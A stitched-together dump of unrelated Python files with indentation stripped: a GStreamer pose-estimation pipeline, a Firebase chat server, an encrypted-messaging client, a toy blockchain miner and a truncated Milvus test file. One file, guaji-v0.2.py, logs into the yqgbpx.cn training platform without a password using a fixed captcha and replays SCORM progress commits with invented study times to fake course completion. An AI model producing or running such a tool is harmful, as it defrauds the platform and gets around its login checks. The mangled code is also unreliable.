if context_type == GstGL.GL_DISPLAY_CONTEXT_TYPE:
sinkelement = overlaysink.get_by_interface(GstVideo.VideoOverlay)
gl_context = sinkelement.get_property('context')
if gl_context:
display_context = Gst.Context.new(GstGL.GL_DISPLAY_CONTEXT_TYPE, True)
GstGL.context_set_gl_display(display_context, gl_context.get_display())
message.src.set_context(display_context)
return Gst.BusSyncReply.PASS
bus = self.pipeline.get_bus()
bus.set_sync_handler(on_bus_message_sync, self.overlaysink)
class Aggregator(GstBase.Aggregator):
SINK_CAPS = 'video/x-raw(memory:GLMemory),format=RGBA,width=[1,{max_int}],height=[1,{max_int}],texture-target=2D'
SINK_CAPS += '; video/x-raw,format=RGB,width=[1,{max_int}],height=[1,{max_int}]'
SINK_CAPS = Gst.Caps.from_string(SINK_CAPS.format(max_int=GLib.MAXINT))
SRC_CAPS = 'video/x-raw(memory:GLMemory),format=RGBA,width=[1,{max_int}],height=[1,{max_int}],texture-target=2D'
SRC_CAPS = Gst.Caps.from_string(SRC_CAPS.format(max_int=GLib.MAXINT))
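    # The two request sink pads intentionally accept different caps: the video
    # branch arrives as RGBA textures in GLMemory, the inference branch as
    # plain RGB in system memory. ensure_pads_found() below uses the caps
    # feature to tell the two pads apart.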
__gstmetadata__ = ('<longname>', '<class>', '<description>', '<author>')
__gsttemplates__ = (
Gst.PadTemplate.new_with_gtype("sink_%u",
Gst.PadDirection.SINK,
Gst.PadPresence.REQUEST,
SINK_CAPS,
GstBase.AggregatorPad.__gtype__),
Gst.PadTemplate.new_with_gtype("src",
Gst.PadDirection.SRC,
Gst.PadPresence.ALWAYS,
SRC_CAPS,
GstBase.AggregatorPad.__gtype__))
# TODO: report actual latency
def __init__(self):
self.vid_pad = None
self.inf_pad = None
self.vid_caps = None
self.inf_caps = None
self.buffers_aggregated_callback = None
self.trash_buffer_callback = None
# TODO: gracefully handle errors.
def ensure_pads_found(self):
if self.vid_pad and self.inf_pad:
return
for pad in self.sinkpads:
caps = pad.get_current_caps()
feature = caps.get_features(0).get_nth(0)
struct = caps.get_structure(0)
if feature == Gst.CAPS_FEATURE_MEMORY_SYSTEM_MEMORY:
self.inf_pad = pad
self.inf_caps = caps
elif feature == GstGL.CAPS_FEATURE_MEMORY_GL_MEMORY:
self.vid_pad = pad
self.vid_caps = caps
assert self.vid_pad and self.inf_pad
def do_aggregate(self, timeout):
self.ensure_pads_found()
assert self.buffers_aggregated_callback
assert self.trash_lock
assert self.trash_buffer_callback
vid_buf = self.vid_pad.pop_buffer()
inf_buf = self.inf_pad.pop_buffer()
# If either input is empty we're EOS (end of stream).
if not vid_buf or not inf_buf:
with self.trash_lock:
self.trash_buffer_callback(vid_buf)
vid_buf = None
return Gst.FlowReturn.EOS
# Get the output buffer to push downstream.
out_buf = self.buffers_aggregated_callback(inf_buf, self.inf_caps, vid_buf, self.vid_caps)
# Unref the inputs ASAP. Drop the final video ref in the GL thread
# or there's deadlock between the GL lock and the Python GIL.
with self.trash_lock:
self.trash_buffer_callback(vid_buf)
vid_buf = None
inf_buf = None
# Push buffer downstream.
ret = self.finish_buffer(out_buf)
# Finally drop the ref to the output buffer, again in the GL thread.
with self.trash_lock:
self.trash_buffer_callback(out_buf)
out_buf = None
return ret
def do_fixate_src_caps (self, caps):
self.ensure_pads_found()
return self.vid_caps
class Inference(GstBase.BaseTransform):
CAPS = 'video/x-raw,format=RGB,width=[1,{max_int}],height=[1,{max_int}]'
CAPS = Gst.Caps.from_string(CAPS.format(max_int=GLib.MAXINT))
__gstmetadata__ = ('<longname>', '<class>', '<description>', '<author>')
__gsttemplates__ = (Gst.PadTemplate.new('sink',
Gst.PadDirection.SINK,
Gst.PadPresence.ALWAYS,
CAPS),
Gst.PadTemplate.new('src',
Gst.PadDirection.SRC,
Gst.PadPresence.ALWAYS,
CAPS)
)
# TODO: report actual latency
def __init__(self):
self.caps = None
self.set_passthrough(False)
self.callback = None
def do_set_caps(self, in_caps, out_caps):
assert in_caps.is_equal(out_caps)
self.caps = in_caps
return True
def do_transform_ip(self, buf):
assert self.callback
self.callback(buf, self.caps)
return Gst.FlowReturn.OK
def register_elements(plugin):
gtype = GObject.type_register(Aggregator)
Gst.Element.register(plugin, 'aggregator', 0, gtype)
gtype = GObject.type_register(Inference)
Gst.Element.register(plugin, 'inference', 0, gtype)
return True
Gst.Plugin.register_static(
Gst.version()[0], Gst.version()[1], # GStreamer version
'', # name
'', # description
register_elements, # init_func
'', # version
'unknown', # license
'', # source
'', # package
'' # origin
)
def run_pipeline(cb, src_size, inference_size, video_src,
h264=False, jpeg=False, mirror=False):
SRC_CAPS = '{format},width={width},height={height},framerate=30/1'
INF_CAPS = 'video/x-raw,format=RGB,width={width},height={height}'
direction = 'horiz' if mirror else 'identity'
PIPELINE = 'aggregator name=agg ! glsvgoverlaysink name=overlaysink \n'
if video_src.startswith('/dev/video'):
PIPELINE += 'v4l2src device={video_src} ! {src_caps}\n ! {lq} ! {decoder}'
if jpeg:
src_format = 'image/jpeg'
decoder = 'decodebin'
elif h264:
src_format = 'video/x-h264'
decoder = 'decodebin'
else:
src_format = 'video/x-raw'
decoder = 'identity'
else:
PIPELINE += 'filesrc location={video_src} ! {decoder}'
src_format = ''
decoder = 'decodebin'
PIPELINE += """ ! glupload ! glvideoflip video-direction={direction} ! tee name=t
t. ! {q} ! glfilterbin filter=glbox name=glbox ! {inf_caps} !
{q} ! inference name=inf ! agg.
t. ! {q} ! agg.
"""
src_caps = SRC_CAPS.format(format=src_format, width=src_size[0], height=src_size[1])
inf_caps = INF_CAPS.format(width=inference_size[0], height=inference_size[1])
q = 'queue max-size-buffers=1'
lq = 'queue max-size-buffers=1 leaky=downstream'
pipeline = PIPELINE.format(src_caps=src_caps, inf_caps=inf_caps, direction=direction,
lq=lq, q=q, video_src=video_src, decoder=decoder)
print('\nGstreamer pipeline:\n')
print(pipeline)
pipeline = GstPipeline(pipeline, cb)
pipeline.run()
def main():
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--mirror', help='flip video horizontally', action='store_true')
parser.add_argument('--model', help='.tflite model path.', required=False)
parser.add_argument('--width', help='Source width', default='1920')
parser.add_argument('--height', help='Source height', default='1080')
parser.add_argument('--videosrc', help='Which video source to use', default='/dev/video0')
parser.add_argument('--h264', help='Use video/x-h264 input', action='store_true')
parser.add_argument('--jpeg', help='Use video/jpeg input', action='store_true')
args = parser.parse_args()
if args.h264 and args.jpeg:
print('Error: both mutually exclusive options h264 and jpeg set')
sys.exit(1)
default_model = 'models/bodypix_mobilenet_v1_075_1024_768_16_quant_edgetpu_decoder.tflite'
model = args.model if args.model else default_model
print('Model: {}'.format(model))
engine = PoseEngine(model)
inference_size = (engine.image_width, engine.image_height)
print('Inference size: {}'.format(inference_size))
src_size = (int(args.width), int(args.height))
if args.videosrc.startswith('/dev/video'):
print('Source size: {}'.format(src_size))
print('Toggle mode keys:')
print(' Toggle skeletons: ', TOGGLE_SKELETONS)
print(' Toggle bounding boxes: ', TOGGLE_BBOXES)
print(' Toggle anonymizer mode: ', TOGGLE_ANON)
print(' Toggle heatmaps: ', TOGGLE_HEATMAP)
print(' Toggle bodyparts: ', TOGGLE_BODYPARTS)
run_pipeline(Callback(engine, src_size, save_every_n_frames=-1, print_stats=True),
src_size, inference_size, video_src=args.videosrc, h264=args.h264, jpeg=args.jpeg,
mirror=args.mirror)
if __name__== "__main__":
main()
|
guaji-v0.2.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#author:dawson
from Tkinter import *
from tkMessageBox import *
import requests
import threading
import time
import json
import random
import base64
import os
from icon import img
reload(sys)
sys.setdefaultencoding( "utf-8" )
wxkc=[]
userlist=[]
def btn_submit():
    # Fetch user info
yhm=entry_id.get()
headers = {'content-type': 'text/json','User-Agent':'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.12 Safari/535.11'}
cookies={'ASP.NET_SessionId':'ji4zk1yzsv1jwvhubwrewect'}
url='http://yqgbpx.cn/yonghu.svc/Login'
data={"yhm":yhm,"mima":"","yanzhengma":"0683","yanzhengmamd5":"8756026CFC20EA25CB630F95D80C48D9"}
r = requests.post(url,headers=headers,data=json.dumps(data),cookies=cookies)
userinfo=json.loads(r.text)['d']
url1='http://yqgbpx.cn/xuexiindex.svc/SelectYonghuxuexiqingkuang_simple'
name=userinfo['Xingming']
dwid=userinfo['DanweiId']
if dwid!=820:
showerror("提示:", "对不起,非指定单位用户!!")
app.destroy()
data={"yhid":userinfo['Yhid']}
userlist.append(userinfo['Yhid'])
userlist.append(userinfo['Yhid'])
r = requests.post(url1,headers=headers,data=json.dumps(data),cookies=cookies)
infolist=json.loads(r.text)['d'][0]
lbl_kcjd = Label(app, text='姓名: '+name+' 已学习课程数:'+str(infolist["m_Item2"])+' 已学习分钟数:'+str(infolist["m_Item3"])+' 已获得学分数:'+str(infolist["m_Item4"]))
lbl_kcjd.grid(row=1, column=1)
url2='http://yqgbpx.cn/xuexiindex.svc/Selectyonghuxuexikecheng'
data={"yhid":userinfo['Yhid'],"changshangId":-1,"kechengmc":"","zhujiangren":"","zhuantiId":-1,"pageIndex":1,"pageSize":10}
r = requests.post(url2,headers=headers,data=json.dumps(data),cookies=cookies)
s=r.text
count=0
for i in json.loads(s)['d']:
wxkc.append([i["ChangshangkechengId"],i["Shichang"]])
btn_method = Checkbutton(fm1, variable = v,onvalue=count, text='课程名称: '+str(i["KechengMc"])+' 课程时长: '+str(i["Shichang"])+' 课程ID: '+str(i["ChangshangkechengId"]), command = callCheckbutton)
btn_method.grid(row=count, column=0, sticky=W, padx=1)
count+=1
def listen(yhid,kcid,mytime):
session_time="00:00:"+str(mytime)
if mytime==60:
session_time="00:01:00"
lsurl='http://www.yqgbpx.cn:81/Scorm12.svc/LMSCommit'
headers = {'content-type': 'application/json','User-Agent':'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.12 Safari/535.11'}
lscookies={"ASP.NET_SessionId":"uyomaapuhy2wdqwe2zgx30zz","InitilizeParam":"kehuId=200&yhId=1018187&kechengId=100021&op=10&shichang=125&xuexizhuangtai=0&lesson_location=&url=index.htm&host=www.yqgbpx.cn&ziyuanleixingid=10","currentState":"lastErrorCode=0&bInitilized=1&bCommitted=0","currentdata":"kehuid=200&student_id=1018187&student_name=&kechengid=100021&scoid=&session_time=00:00:01&lesson_location=704&lesson_status=incomplete&entry=ab-initio&scoreraw=&exit=&credit=no-credit&total_time=0:0:0&lesson_mode=normal&xuexizhuangtai=0&Totaltime=0","currentdata1":""}
lgdata={"obj":{"KehuId":"200","Yhid":yhid,"KechengId":kcid,"Scoid":"","session_time":session_time,"Lesson_location":"704","Lesson_status":"incomplete","Entry":"ab-initio","Scoreraw":"","Lesson_mode":"normal","Exit":"","Suspend_data":"","Totaltime":"0"}}
r = requests.post(lsurl,cookies=lscookies,headers=headers,data=json.dumps(lgdata))
def gjcore():
yhid=userlist[0]
kcid=str(wxkc[v.get()][0])
count=0
var.set('正在挂机: ')
while True:
mytime=random.randint(20, 60)
listen(yhid,kcid,mytime)
time.sleep(mytime)
count+=mytime
var.set('已挂机: '+str(count)+' 秒--共计:'+str(count/60)+' 分钟')
if count>=int(wxkc[v.get()][1])*60:
break
var.set('所选课程已全部听完')
def guaji():
th=threading.Thread(target=gjcore)
th.setDaemon(True)
th.start()
##### Create the window #####
app = Tk()
app.title("挂机软件v0.2 指定单位免费版 作者 --Dawson")
tmp = open("tmp.ico","wb+")
tmp.write(base64.b64decode(img))
tmp.close()
app.iconbitmap("tmp.ico")
os.remove("tmp.ico")
##### Create widgets #####
# Row 1: login fields
lbl_id = Label(app, text="请输入用户名:")
lbl_id.grid(row=0,sticky=E)
yhid=StringVar()
entry_id = Entry(app,textvariable=yhid)
entry_id.grid(row=0, column=2)
lbl_id = Label(app, text="请输入密码:")
lbl_id.grid(row=0,column=3,sticky=E)
entry_mm = Entry(app,show = '*')
entry_mm.grid(row=0, column=4)
btn_submit = Button(app, text="获取用户及课程信息",command=btn_submit)
btn_submit.grid(row=0, column=5)
# Show course info
lbl_kcxx = Label(app, text="个人信息:")
lbl_kcxx.grid(row=1, column=0,sticky=W)
# Course selection
lbl_xzkc = Label(app, text="未学习课程:")
lbl_xzkc.grid(row=2, column=0, sticky=W)
fm1 = Frame()
fm1.grid(row=2, column=1, sticky=W)
v = IntVar()
def callCheckbutton():
lbl_kclb = Label(app, text='所选课程id为')
lbl_kclb.grid(row=4, column=0, sticky=W, pady=1, padx=1)
lbl_kclb = Label(app, text=str(wxkc[v.get()][0]))
lbl_kclb.grid(row=4, column=1, sticky=W, pady=1, padx=1)
return v.get()
# Guaji (auto-listen) button
btn_guaji = Button(app, text="开始挂机",command=guaji)
btn_guaji.grid(row=5, column=1, sticky=W, padx=5,pady=10)
lbl_gj = Label(app, text='挂机进度: ')
lbl_gj.grid(row=6, column=0, sticky=W, pady=1, padx=1)
var=StringVar()
var.set(' ')
lbl_gjsj = Label(app,textvariable=var)
lbl_gjsj.grid(row=7, column=0, sticky=W, pady=1, padx=1)
lbl_id = Label(app, text="Tip:①请联网使用!一次只展示10条未听课程 ")
lbl_id.grid(row=8 )
lbl_id = Label(app, text="②默认勾选不生效,须选择一个课程 ")
lbl_id.grid(row=9 )
lbl_id = Label(app, text="③界面出现所选课程id后即可挂机 ")
lbl_id.grid(row=10)
lbl_id = Label(app, text="④听完可登陆浏览器确定进度并答题 ")
lbl_id.grid(row=11)
lbl_id = Label(app, text="⑤界面画风请忽略,保证无毒无害,放心使用 ")
lbl_id.grid(row=12)
lbl_id = Label(app, text="⑥低调使用,毕竟非正规,且挂且珍惜 ")
lbl_id.grid(row=13)
lbl_id = Label(app, text="⑦免费版本不开启如自动听课等变态功能 ")
lbl_id.grid(row=14)
app.mainloop()
|
server.py
|
import socket, threading
import firebase_admin
from firebase_admin import credentials, auth, db
cred = credentials.Certificate("firebase/opensw-team1-firebase-adminsdk-ln99u-734bf11a84.json")
default_app = firebase_admin.initialize_app(cred, {
'databaseURL' : 'https://opensw-team1-default-rtdb.asia-southeast1.firebasedatabase.app/'
})
class Room:
def __init__(self):
self.gamers = []
self.allChat=None
def addClient(self, c):
self.gamers.append(c)
def delClient(self, c):
self.gamers.remove(c)
def sendMsgAll(self, msg):
for i in self.gamers:
print(i)
i.sendMsg(msg)
# Screen shown to a connected client
class ChatClient:
def __init__(self, r, soc):
self.room = r
self.id = None
self.soc = soc
def readMsg(self):
self.id = self.soc.recv(1024).decode()
msg = self.id + '님이 입장하셨습니다'
self.room.sendMsgAll(msg)
while True:
msg = self.soc.recv(1024).decode()
if msg == '/stop':
                self.soc.sendall(msg.encode())
self.room.delClient(self)
break
msg = self.id+': '+ msg
self.room.sendMsgAll(msg)
self.room.sendMsgAll(self.id + '님이 퇴장하셨습니다.')
def sendMsg(self, msg):
print(type(msg))
self.soc.sendall(msg.encode(encoding='utf-8'))
# Screen shown to the server operator
class ChatServer:
HOST = socket.gethostbyname(socket.gethostname())
PORT = 9999
is_another_server_online = False
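    # Only one chat server should be reachable at a time: the Firebase Realtime
    # Database entry server_info/is_server_open acts as a simple flag, and
    # current_server_ip records where this instance is listening (presumably
    # read by the client). A second instance that sees the flag set refuses to
    # start.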
def __init__(self):
if(db.reference('server_info').child('is_server_open').get() == 'True') :
print('서버가 이미 열려있습니다.')
self.is_another_server_online = True
return
db.reference('server_info').child('current_server_ip').set(self.HOST)
db.reference('server_info').child('is_server_open').set('True')
self.server_soc = None
self.room = Room()
self.run()
def __del__(self):
        # If another host already opened the server, exit without switching the server state to offline.
if(self.is_another_server_online != True) :
db.reference('server_info').child('is_server_open').set('False')
def open(self):
self.server_soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server_soc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server_soc.bind((ChatServer.HOST, ChatServer.PORT))
self.server_soc.listen()
def run(self):
self.open()
print('서버 시작')
while True:
client_soc, addr = self.server_soc.accept()
print(addr, '접속')
c = ChatClient(self.room, client_soc)
self.room.addClient(c)
print('접속자:',self.room.gamers)
th = threading.Thread(target=c.readMsg)
th.start()
#self.server_soc.close()
def main():
ChatServer()
main()
|
client.py
|
from Gamal import *
from cert_utils import *
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.hazmat.primitives import serialization
from flask import Flask, redirect, url_for, request
import threading
import os
import base64
app = Flask(__name__)
import requests
import argparse
from base64 import b64encode, b64decode
@app.route('/msg', methods=['POST'])
def receive_message():
input_json = request.get_json(force=True)
encrypted_message = input_json["msg"]
sig_r = input_json["sig_r"]
sig_s = input_json["sig_s"]
sender_id = input_json["id"]
message = private_key_decrypt(encrypted_message, client_private_key) # Decrypt the message.
print(" Requesting certificates for user: ", sender_id)
client_data = {'id': client_id,
'receiver': sender_id}
res = requests.post(ca_url + "/get_client_key_cert", json=client_data)
receiver_cert = cert_from_bytes(str.encode(res.text))
valid_cert = cert_validate_signature(receiver_cert, ca_public_key) # Validate cert.
if valid_cert:
print("RSA public key cert received from CA for receiver: ", client_data["receiver"],
" is valid")
else:
print("RSA public key cert received from CA for receiver: ", client_data["receiver"],
" is invalid")
return
res = requests.post(ca_url + "/get_client_gammal_cert", json=client_data)
receiver_cert = cert_from_bytes(str.encode(res.text))
valid_cert = cert_validate_signature(receiver_cert, ca_public_key) # Validate cert.
if valid_cert:
print("Gammal public key cert received from CA for receiver: ", client_data["receiver"],
" is valid")
else:
print("Gammal public key cert received from CA for receiver: ", client_data["receiver"],
" is invalid")
return
gammal_fake_pub_key = cert_get_pub_key(receiver_cert)
gammal_pub_key = get_fake_key_val(gammal_fake_pub_key)
valid_signature = verifyElGamalSignature(gammal_pub_key, sig_r, sig_s, message)
print("Message received from: ", sender_id)
if valid_signature:
print("Valid signature of: ", sender_id)
else:
print("Invalid signature")
return "no"
if valid_signature:
print("Message:", message)
return "ok"
def send_message(message, url):
"""
    Get the receiver's certificate, validate it, encrypt the message with it, and then send it.
"""
client_data = {'id': client_id,
'receiver': other_client_id}
res = requests.post(ca_url + "/get_client_key_cert", json=client_data)
receiver_cert = cert_from_bytes(str.encode(res.text))
valid_cert = cert_validate_signature(receiver_cert, ca_public_key) # Validate cert.
if valid_cert:
print("RSA public key cert received from CA for receiver: ", client_data["receiver"],
" is valid")
else:
print("RSA public key cert received from CA for receiver: ", client_data["receiver"],
" is invalid")
return
receiver_public_key = cert_get_pub_key(receiver_cert)
encrypted_message = public_key_encrypt(message, receiver_public_key)
rr, ss = generateElGamalSignature(sig_priv, message) # signature.
client_data = {'id': client_id,
'msg': encrypted_message,
"sig_r": rr,
"sig_s": ss
}
requests.post(url + "/msg", json=client_data)
def publish_client_data_to_ca(ca_url):
# Generating certificate for rsa public key.
client_data = {'id': client_id,
'public_key': client_public_key.public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo,
)}
requests.post(ca_url + "/generate_key_cert", json=client_data)
# Generating certificate for el gammal public key.
client_data = {'id': client_id,
'public_key': sig_pub_key}
requests.post(ca_url + "/generate_gammal_cert", json=client_data)
def send_loop():
while True:
message = input(" write message to send to client: " + other_client_url +
" | write exit to exit\n") # Message to send.
if message == "exit":
return
send_message(message, other_client_url)
print(" Message sent")
if __name__ == "__main__":
sig_priv, sig_pub_key = generateElGamalKey()
curr_dir_path = os.path.dirname(os.path.realpath(__file__)) # Get current directory
parser = argparse.ArgumentParser()
parser.add_argument("-p", "--port", help="your port")
parser.add_argument("-op", "--otherport", help="receiver port")
args = parser.parse_args()
ca_public_key = public_key_load(curr_dir_path + "/ca/ca_public_key.pem")
other_client_id = args.otherport
other_client_url = 'http://127.0.0.1:' + args.otherport
client_id = args.port
client_private_key = rsa.generate_private_key(
public_exponent=65537,
key_size=2048,
backend=default_backend()) # Generate private key for client.
client_public_key = client_private_key.public_key() # Generate public key for client.
ca_url = 'http://127.0.0.1:5000'
print(" Sending ", client_id, " data to CA")
publish_client_data_to_ca(ca_url)
sending_thread = threading.Thread(target=send_loop)
sending_thread.start()
app.run(port=args.port)
|
miner.py
|
import time
import hashlib
import json
import requests
import base64
from flask import Flask, request
from multiprocessing import Process, Pipe
import ecdsa
from miner_config import MINER_ADDRESS, MINER_NODE_URL, PEER_NODES
node = Flask(__name__)
class Block:
def __init__(self, index, timestamp, data, previous_hash):
"""Returns a new Block object. Each block is "chained" to its previous
by calling its unique hash.
Args:
index (int): Block number.
timestamp (int): Block creation timestamp.
data (str): Data to be sent.
previous_hash(str): String representing previous block unique hash.
Attrib:
index (int): Block number.
timestamp (int): Block creation timestamp.
data (str): Data to be sent.
previous_hash(str): String representing previous block unique hash.
hash(str): Current block unique hash.
"""
self.index = index
self.timestamp = timestamp
self.data = data
self.previous_hash = previous_hash
self.hash = self.hash_block()
def hash_block(self):
"""Creates the unique hash for the block. It uses sha256."""
sha = hashlib.sha256()
sha.update((str(self.index) + str(self.timestamp) + str(self.data) + str(self.previous_hash)).encode('utf-8'))
return sha.hexdigest()
def create_genesis_block():
"""To create each block, it needs the hash of the previous one. First
block has no previous, so it must be created manually (with index zero
and arbitrary previous hash)"""
return Block(0, time.time(), {
"proof-of-work": 9,
"transactions": None},
"0")
# Node's blockchain copy
BLOCKCHAIN = [create_genesis_block()]
""" Stores the transactions that this node has in a list.
If the node you sent the transaction adds a block
it will get accepted, but there is a chance it gets
discarded and your transaction goes back as if it was never
processed"""
NODE_PENDING_TRANSACTIONS = []
def proof_of_work(last_proof, blockchain):
# Creates a variable that we will use to find our next proof of work
incrementer = last_proof + 1
    # Keep incrementing the incrementer until it reaches a number divisible by 7919
    # and by the proof of work of the previous block in the chain
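    # Example: with last_proof = 9, the loop stops at 71271, the smallest
    # number greater than 9 divisible by both 7919 and 9 (7919 is prime, so
    # this is just 7919 * 9).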
start_time = time.time()
while not (incrementer % 7919 == 0 and incrementer % last_proof == 0):
incrementer += 1
# Check if any node found the solution every 60 seconds
if int((time.time() - start_time) % 60) == 0:
# If any other node got the proof, stop searching
new_blockchain = consensus(blockchain)
if new_blockchain:
# (False: another node got proof first, new blockchain)
return False, new_blockchain
# Once that number is found, we can return it as a proof of our work
return incrementer, blockchain
def mine(a, blockchain, node_pending_transactions):
BLOCKCHAIN = blockchain
NODE_PENDING_TRANSACTIONS = node_pending_transactions
while True:
"""Mining is the only way that new coins can be created.
In order to prevent too many coins to be created, the process
is slowed down by a proof of work algorithm.
"""
# Get the last proof of work
last_block = BLOCKCHAIN[-1]
last_proof = last_block.data['proof-of-work']
# Find the proof of work for the current block being mined
# Note: The program will hang here until a new proof of work is found
proof = proof_of_work(last_proof, BLOCKCHAIN)
# If we didn't guess the proof, start mining again
if not proof[0]:
# Update blockchain and save it to file
BLOCKCHAIN = proof[1]
a.send(BLOCKCHAIN)
continue
else:
# Once we find a valid proof of work, we know we can mine a block so
# ...we reward the miner by adding a transaction
# First we load all pending transactions sent to the node server
NODE_PENDING_TRANSACTIONS = requests.get(url=MINER_NODE_URL + '/txion',
params={'update': MINER_ADDRESS}).content
NODE_PENDING_TRANSACTIONS = json.loads(NODE_PENDING_TRANSACTIONS)
# Then we add the mining reward
NODE_PENDING_TRANSACTIONS.append({
"from": "network",
"to": MINER_ADDRESS,
"amount": 1})
# Now we can gather the data needed to create the new block
new_block_data = {
"proof-of-work": proof[0],
"transactions": list(NODE_PENDING_TRANSACTIONS)
}
new_block_index = last_block.index + 1
new_block_timestamp = time.time()
last_block_hash = last_block.hash
# Empty transaction list
NODE_PENDING_TRANSACTIONS = []
# Now create the new block
mined_block = Block(new_block_index, new_block_timestamp, new_block_data, last_block_hash)
BLOCKCHAIN.append(mined_block)
# Let the client know this node mined a block
print(json.dumps({
"index": new_block_index,
"timestamp": str(new_block_timestamp),
"data": new_block_data,
"hash": last_block_hash
}) + "\n")
a.send(BLOCKCHAIN)
requests.get(url=MINER_NODE_URL + '/blocks', params={'update': MINER_ADDRESS})
def find_new_chains():
# Get the blockchains of every other node
other_chains = []
for node_url in PEER_NODES:
# Get their chains using a GET request
block = requests.get(url=node_url + "/blocks").content
# Convert the JSON object to a Python dictionary
block = json.loads(block)
# Verify other node block is correct
validated = validate_blockchain(block)
if validated:
# Add it to our list
other_chains.append(block)
return other_chains
def consensus(blockchain):
# Get the blocks from other nodes
other_chains = find_new_chains()
# If our chain isn't longest, then we store the longest chain
BLOCKCHAIN = blockchain
longest_chain = BLOCKCHAIN
for chain in other_chains:
if len(longest_chain) < len(chain):
longest_chain = chain
# If the longest chain wasn't ours, then we set our chain to the longest
if longest_chain == BLOCKCHAIN:
# Keep searching for proof
return False
else:
# Give up searching proof, update chain and start over again
BLOCKCHAIN = longest_chain
return BLOCKCHAIN
def validate_blockchain(block):
"""Validate the submitted chain. If hashes are not correct, return false
block(str): json
"""
return True
@node.route('/blocks', methods=['GET'])
def get_blocks():
# Load current blockchain. Only you should update your blockchain
if request.args.get("update") == MINER_ADDRESS:
global BLOCKCHAIN
BLOCKCHAIN = b.recv()
chain_to_send = BLOCKCHAIN
# Converts our blocks into dictionaries so we can send them as json objects later
chain_to_send_json = []
for block in chain_to_send:
block = {
"index": str(block.index),
"timestamp": str(block.timestamp),
"data": str(block.data),
"hash": block.hash
}
chain_to_send_json.append(block)
# Send our chain to whomever requested it
chain_to_send = json.dumps(chain_to_send_json)
return chain_to_send
@node.route('/txion', methods=['GET', 'POST'])
def transaction():
"""Each transaction sent to this node gets validated and submitted.
Then it waits to be added to the blockchain. Transactions only move
    coins; they don't create them.
"""
if request.method == 'POST':
# On each new POST request, we extract the transaction data
new_txion = request.get_json()
# Then we add the transaction to our list
if validate_signature(new_txion['from'], new_txion['signature'], new_txion['message']):
NODE_PENDING_TRANSACTIONS.append(new_txion)
# Because the transaction was successfully
# submitted, we log it to our console
print("New transaction")
print("FROM: {0}".format(new_txion['from']))
print("TO: {0}".format(new_txion['to']))
print("AMOUNT: {0}\n".format(new_txion['amount']))
# Then we let the client know it worked out
# my code-----------------------------------------------------------
f = open("transactions_share.txt", "w")
# f = open(r"C:\transactions_share.txt", "w")
print("New transaction", file=f)
print("FROM: {0}".format(new_txion['from']), file=f)
print("TO: {0}".format(new_txion['to']), file=f)
print("AMOUNT: {0}\n".format(new_txion['amount']), file=f)
f.close()
# my code------------------------------------------------------------
return "Transaction submission successful\n"
else:
return "Transaction submission failed. Wrong signature\n"
# Send pending transactions to the mining process
elif request.method == 'GET' and request.args.get("update") == MINER_ADDRESS:
pending = json.dumps(NODE_PENDING_TRANSACTIONS)
# Empty transaction list
NODE_PENDING_TRANSACTIONS[:] = []
return pending
def validate_signature(public_key, signature, message):
"""Verifies if the signature is correct. This is used to prove
it's you (and not someone else) trying to do a transaction with your
address. Called when a user tries to submit a new transaction.
"""
public_key = (base64.b64decode(public_key)).hex()
signature = base64.b64decode(signature)
vk = ecdsa.VerifyingKey.from_string(bytes.fromhex(public_key), curve=ecdsa.SECP256k1)
# Try changing into an if/else statement as except is too broad.
try:
return vk.verify(signature, message.encode())
except:
return False
def welcome_msg():
print(""" =========================================\n
SIMPLE COIN v1.0.0 - BLOCKCHAIN SYSTEM\n
=========================================\n\n
You can find more help at: https://github.com/cosme12/SimpleCoin\n
    Make sure you are using the latest version or you may end up in
a parallel chain.\n\n\n""")
if __name__ == '__main__':
welcome_msg()
# Start mining
a, b = Pipe()
p1 = Process(target=mine, args=(a, BLOCKCHAIN, NODE_PENDING_TRANSACTIONS))
p1.start()
# Start server to receive transactions
    p2 = Process(target=node.run)  # pass the callable itself; calling it here would block
p2.start()
|
test_collection.py
|
import numpy
import pandas as pd
import pytest
from pymilvus import DataType
from base.client_base import TestcaseBase
from utils.util_log import test_log as log
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
from utils.utils import *
from common import constants as cons
prefix = "collection"
exp_name = "name"
exp_schema = "schema"
exp_num = "num_entities"
exp_primary = "primary"
exp_shards_num = "shards_num"
default_schema = cf.gen_default_collection_schema()
default_binary_schema = cf.gen_default_binary_collection_schema()
default_shards_num = 2
uid_count = "collection_count"
tag = "collection_count_tag"
uid_stats = "get_collection_stats"
uid_create = "create_collection"
uid_describe = "describe_collection"
uid_drop = "drop_collection"
uid_has = "has_collection"
uid_list = "list_collections"
uid_load = "load_collection"
field_name = default_float_vec_field_name
default_single_query = {
"data": gen_vectors(1, default_dim),
"anns_field": default_float_vec_field_name,
"param": {"metric_type": "L2", "params": {"nprobe": 10}},
"limit": default_top_k,
}
class TestCollectionParams(TestcaseBase):
""" Test case of collection interface """
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_none_removed_invalid_strings(self, request):
if request.param is None:
pytest.skip("None schema is valid")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_type_fields(self, request):
if isinstance(request.param, list):
pytest.skip("list is valid fields")
yield request.param
@pytest.fixture(scope="function", params=cf.gen_all_type_fields())
def get_unsupported_primary_field(self, request):
if request.param.dtype == DataType.INT64:
pytest.skip("int64 type is valid primary key")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_dim(self, request):
if request.param == 1:
pytest.skip("1 is valid dim")
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_collection(self):
"""
target: test collection with default schema
method: create collection with default schema
expected: assert collection property
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema, exp_num: 0,
exp_primary: ct.default_int64_field_name})
assert c_name in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L2)
